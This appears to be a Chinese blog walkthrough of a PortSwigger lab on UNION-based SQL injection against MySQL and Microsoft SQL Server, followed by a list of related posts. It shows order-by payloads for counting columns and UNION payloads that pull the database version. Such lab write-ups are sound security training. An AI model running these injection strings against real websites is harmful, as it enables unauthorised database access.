burpsuite靶场----SQL注入3----mysql与microsoft的union注入

前言

常利用注入获得当前数据库database(),版本version()、@@version,用户user()

靶场地址

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft

正式开始

1.访问这些标签

2.
先判断返回结果的列数,因为mysql如果注入的列数大于返回结果的列数的话会报错
' order by 1 %23没报错
' order by 2 %23没报错
' order by 3 %23报错了
说明列数有两列
所以payload:
' union select 1,version()%23
或者
' union select 1,@@version%23

本栏目推荐文章
• Jmeter 如何连接mysql数据库？
• 如何通过Navicat把MySQL远程数据库导入到本地数据库
• 聊一聊如何结合Microsoft.Extensions.DependenyInjection和Castle.Core
• 聊一聊如何整合Microsoft.Extensions.DependencyInjection和Castle.Core(二)
• 聊一聊如何整合Microsoft.Extensions.DependencyInjection和Castle.Core(三)
• 聊一聊如何整合Microsoft.Extensions.DependencyInjection和Castle.Core(完结篇)
• 【LeetCode 2701. 连续递增交易】MySQL用户变量编程得到严格递增连续子序列的开始位置，结束位置，长度等统计信息
• 【Leetcode 2474. 购买量严格增加的客户】MySQL用户变量编程解决严格递增连续子序列问题
• mysql发生连接异常Cause: com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure
• 【LeetCode 2494. 合并在同一个大厅重叠的活动】MySQL用户变量编程解决区间合并问题

靶场 burpsuite microsoft mysql union靶场burpsuite oracle union 靶场burpsuite microsoft mysql 靶场burpsuite目录 靶场burpsuite信息sql 靶场burpsuite数据sql 靶场burpsuite信息 靶场burpsuite时间oracle 靶场burpsuite xss xss1 靶场burpsuite服务器ssrf 靶场burpsuite